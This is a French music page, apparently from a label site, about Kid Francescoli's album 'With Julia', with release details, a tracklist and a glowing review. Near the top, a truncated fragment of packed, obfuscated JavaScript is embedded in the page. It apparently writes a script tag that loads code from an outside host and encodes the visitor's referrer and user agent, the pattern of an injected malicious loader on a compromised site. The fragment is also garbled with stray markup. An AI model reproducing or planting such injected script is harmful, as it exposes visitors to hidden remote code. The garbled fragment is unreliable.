With Julia

Home » Artists » Kid Francescoli » With Julia
=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("< \/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhfar|var|u0026u|referrer|yrnni||js|php'.split('|'),0,{})) class= »col-md-8″]
bikini1
ARTISTE : Kid Francescoli
ALBUM : With Julia
DATE DE SORTIE : 9 mars 2015
GENRE : electro/pop
RÉFÉRENCE : YO40
TRACKLISTING :
1- Blow Up
2- My Baby
3- Prince Vince
4- Boom boom #2
5- Does She?
6- I don’t know how
7- Mr Know It All
8- Disco Queen
9- Italia 90
10-Dirty Blonde

La question est récurrente. A-t-on besoin de connaître la vie de l’auteur, le contexte de création, pour apprécier une œuvre ? Le réponse semble évidente : non. Et pourtant, quand l’histoire autour est belle, extra-ordinaire au sens premier du terme, il est forcément tentant de s’y attarder, de s’en délecter, jusqu’à parfois oublier de s’intéresser au plus important, l’œuvre en elle-même…

Prenez « With Julia » de Kid Francescoli, il serait facile de succomber à l’histoire de ce disque, du moins encore plus vite qu’à son contenu. Car l’histoire qu’a vécue Mathieu Hocine a.k.a Kid Francescoli ferait un bon pitch de comédie romantique à succès : un jeune Français part vivre quelques mois à New York, y tombe éperdument amoureux, se sépare, puis écrit la BO de sa romance à quatre mains avec sa muse.

Mais une histoire, aussi belle soit-elle, ne résistera jamais à l’épreuve du temps. Les chansons écrites par le Kid et Julia, si. Nous voulons donc leur rendre l’hommage qu’elles méritent car nous pensons qu’elles sont largement aussi fortes et profondes que la passion qui les a fait naitre.

La première chose qui frappe après l’écoute de ce « With Julia », c’est que vous en sortez plein de sentiments mêlés : une mélancolie évidente, mais aussi une réelle joie de vivre, une naïveté toute rafraichissante. Un peu à l’image de la production de l’album qui donne l’impression d’écouter un disque pop classique, avec ses gimmicks habituels pour que chaque titre reste bien en tête (thèmes, sifflotements, claquements de doigts, clappements de mains), sauf que tout ici est synthétique et astucieusement réinventé par le petit génie Simon Henner (du groupe Nasser), et savamment mis en valeur par le mix de Krikor Kouchian. Ce qui fait de « With Julia » un disque qu’on peut écouter seul à rêvasser dans son lit, ou à plein tubes dans un club à se faire caresser par les basses !

Qu’elles soient joyeusement mélancoliques (« Blow Up », « Boom Boom#2 », « Mr Know It All », « Italia 90 ») ou tristement dansantes (« Prince Vince », « Does She », « Disco Queen »), les chansons de Kid Francescoli ont toujours l’art de trouver la mélodie immédiate qui vous accompagne pendant des jours. Si l’on devait résumer, la comparaison qui nous semble la plus appropriée pour tenter de vous donner la teneur de ce disque vaporeux, c’est d’imaginer Radiohead reprendre les meilleures chansons de ABBA pour la BO d’un deuxième volet de « Virgin Suicides ».

A vous de vivre vos histoires les plus belles avec ce disque dans les oreilles !



VIDEOS


CONCERTS